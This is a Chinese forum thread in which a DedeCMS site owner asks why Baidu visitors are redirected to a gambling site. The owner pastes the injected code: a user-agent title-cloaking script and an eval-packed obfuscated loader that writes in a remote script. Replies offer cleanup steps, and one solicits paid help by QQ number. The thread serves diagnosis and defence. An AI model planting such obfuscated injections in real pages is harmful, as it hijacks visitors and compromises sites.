织梦程序做的站 最新版的织梦 该打的补丁也打了。 360网站安全检测也没问题全绿

现在情况是一到晚上  百度搜索点击网站打开直接跳转到一个菠菜网站。但是我直接输入域名的话没事。 我在后台更新下主页 这个问题就没了。。

我也查了网站程序文件 近期修改的文件 有几个疑似病毒文件PHP后缀的我也删掉了 但是现在还是反复出现跳转页面。。

右键查看源代码  头部多了以下木马代码：（但是我查源码里面又没有这些网页上多出来的代码。）

<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="智能中国网_国内领先的AI智能科技门户"}</script>

<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('m["\\n\\b\\1\\e\\j\\7\\o\\0"]["\\l\\3\\8\\0\\7"](\'\\i\\2\\1\\3\\8\\4\\0 \\0\\k\\4\\7\\d\\6\\0\\7\\s\\0\\5\\f\\c\\t\\c\\2\\1\\3\\8\\4\\0\\6 \\2\\3\\1\\d\\6\\9\\0\\0\\4\\2\\p\\5\\5\\2\\a\\9\\e\\a\\9\\r\\g\\1\\b\\j\\5\\k\\q\\1\\g\\f\\2\\6\\h\\i\\5\\2\\1\\3\\8\\4\\0\\h\');',30,30,'x74|x63|x73|x72|x70|x2f|x22|x65|x69|x68|x66|x6f|x61|x3d|x75|x6a|x2e|x3e|x3c|x6d|x79|x77|window|x64|x6e|x3a|x6c|x32|x78|x76'.split('|'),0,{}))

</script> 

这应该是XSS攻击   我同一个服务器上放了10个站 有6个出现这种一样的情况  这是服务器被挂马还是网站挂马？求大佬告诉怎么解决 

已经被百度提示虚假网站了。需要快速解决的话我帮你，这种我处理过，企鹅号1104798268

下载本地用web shell kill扫一遍后门，然后把把之前空间内容格式化，接着重新安装一个织梦系统，在把原数据，跟必要的文件传上去。

被挂马了，感觉好危险啊

现在有些木马连修改时间都一并改了，可能是漏了什么文件，先用软件全盘检查下，然后织梦的话在服务器里把一些重要的文件夹文件等设置权限为只读，然后再更新下网站更新下百度快照就可以了

刚刚在另外一个问题回复过了，织梦的站，建议不使用的模块都卸载，服务器建议安装一个云锁，如果网站不经常更新，建议直接把写入修改的权限都锁死，需要修改的时候在开放。

把网站代码打包到本地，用D盾扫描检测下有没有webshell后门和木马之后 ，有则对应修改。之后更新快照。服务器不想花钱可以安装一个安全狗

慢慢排查吧，我也不会，祝你好运····

是你的服务器被攻击了，然后导致网站被挂马，服务器要装个安全软件，然后排查服务器哪里出问题，真找不出问题就重装或者还原一下服务器，再有就是网站对应的模板应该是被植入了广告了

可能有后门吧，具体情况得排查，反正有点烦，

看看头部文件，还有根目录里面，新的目录只要不是自己的就删掉，安装一个安全神保护者